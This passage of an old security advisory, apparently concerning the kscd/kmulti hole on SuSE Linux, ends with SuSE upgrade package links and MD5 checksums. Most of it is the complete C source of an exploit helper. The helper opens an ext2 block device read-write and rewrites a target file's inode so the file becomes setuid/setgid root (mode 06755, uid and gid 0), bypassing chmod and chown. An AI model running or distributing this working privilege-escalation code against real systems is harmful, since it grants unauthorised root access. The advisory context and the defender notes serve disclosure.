#endif /* _LINUX_EXT2_FS_H */
--- ext2fs.c ---
/* This file belongs to the kscd-hack. Do not use it at all,
* it is called by the perl-script.
* FOR EDUCATIONAL PURPOSES ONLY!
* YOU USE IT AT YOUR OWN RISK!
*/
#include <stdio.h>
#include "ext2_fs.h"
#include <ext2fs/ext2fs.h>
#include <ext2fs/ext2_io.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/types.h>
#include <errno.h>
#include <string.h>
/*
 * Report the expected invocation on stderr, with s printed as the program
 * name, then terminate the process with exit status 1. Does not return.
 */
int usage(char *s)
{
	fprintf(stderr,
	        "Man, use it like this: %s <filesystem> <file>\n",
	        s);
	exit(1);
}
/*
 * Helper invoked by the Perl script above.
 *
 * argv[1] is the block device of an ext2 filesystem, argv[2] a file on it.
 * The program rewrites mode, owner and group in that file's on-disk inode by
 * opening the device read-write through libext2fs. The only privilege this
 * needs is write access to the device node, which is what group 'disk' grants
 * on the affected systems -- the reason a setgid-disk program has to be
 * treated as root-equivalent.
 *
 * For defenders: as the final message states, the mounted filesystem keeps
 * showing the old mode until the next remount, so a setuid/integrity scan has
 * to be repeated after that mount to see the change.
 */
int main(int argc, char **argv)
{
ext2_filsys fsd;
struct stat st;
struct ext2_inode stealth_inode;
int i;
if (argc < 3)
usage(argv[0]);
/* Fetch inode# */
if (stat(argv[2], &st) < 0) {
perror("stat");
exit(errno);
}
/* sync() is called ten times before the device is opened directly. */
for (i = 0; i < 10; i++)
sync();
if (ext2fs_open(argv[1], EXT2_FLAG_RW /* open RW */, 0 /* use def. superblock */, 0 /* def.size */,
unix_io_manager /* default manager */, &fsd) != 0) {
fprintf(stderr, "Error opeening %s-FS\n", argv[1]);
exit(errno);
}
printf("Your fuxoring inode-number is %d\n", st.st_ino);
if (ext2fs_read_inode(fsd, st.st_ino, &stealth_inode) != 0) {
fprintf(stderr, "Error reading inode.\n");
exit(1);
}
/* 06755 = setuid + setgid + rwxr-xr-x on a regular file; uid/gid 0 = root. */
stealth_inode.i_mode = 06755|S_IFREG;
stealth_inode.i_uid = 0;
stealth_inode.i_gid = 0;
/* Written back through the device, not through chmod()/chown(). */
if (ext2fs_write_inode(fsd, st.st_ino, &stealth_inode) != 0) {
fprintf(stderr, "Error writing inode.\n");
exit(1);
}
if (ext2fs_close(fsd) != 0) {
fprintf(stderr, "Error closing filesystem.\n");
exit(1);
}
printf("The requested file will have mode 06755 after next remount. Make sure nobody\n"
"open()/close() it until remount, coz kernel still has the old mode 0755 cached\n"
"and will write this to disk if you do so!\n\n");
return 0;
}
建议:
SuSE 提供了相应的升级软件包,可以在下列地址下载:
AXP:
817852e77080ecb444cb3ab9d0e6f52d ftp://ftp.suse.com/pub/suse/axp/update/6.1/kde1/kmulti-1.1.2-141.alpha.rpm
bf3ea6a10793225d5468efa72efb13cb ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
8e1cc62cf437c43eca044562637d9ea3 ftp://ftp.suse.com/pub/suse/axp/update/6.3/kde1/kmulti-1.1.2-141.alpha.rpm
61dc0c2588a707ec9ba1c6be00aac58c ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
45e951b3b14435a1c1ab89d3e4e5df1d ftp://ftp.suse.com/pub/suse/axp/update/6.4/kde1/kmulti-1.1.2-141.alpha.rpm
a70b356603227e1a0e49d0eeab934ad8 ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/kmulti-1.1.2-141.src.rpm
i386:
d4c6bc55edbb9aa4da76b2d9b186e6a9 ftp://ftp.suse.com/pub/suse/i386/update/6.1/kde1/kmulti-1.1.2-141.i386.rpm
9ac324e3a9bb1794280d8175f5762d5d ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
f8318113abdde6e2a9118db63d50a550 ftp://ftp.suse.com/pub/suse/i386/update/6.2/kde1/kmulti-1.1.2-141.i386.rpm
18d5fc80412db2dc70770d9b175180d9 ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/kmulti-1.1.2-141.src.rpm
43f1febe8dc5502132246b8ad977db54 ftp://ftp.suse.com/pub/suse/i386/update/6.3/kde1/kmulti-1.1.2-141.i386.rpm
bce686afd6186c9cb9816ccf95744040 ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
4a14b88f9b6f80c8ffcf4b82750d7bfb ftp://ftp.suse.com/pub/suse/i386/update/6.4/kde1/kmulti-1.1.2-140.i386.rpm
de787463851f38b69e576cf8de7d9309 ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/kmulti-1.1.2-140.src.rpm
PPC:
3de7429a24620ca2b7e61f799478e2b8 ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kde1/kmulti-1.1.2-141.ppc.rpm
444e9ffc4fbc643deb208c45bcb31725 ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/kmulti-1.1.2-141.src.rpm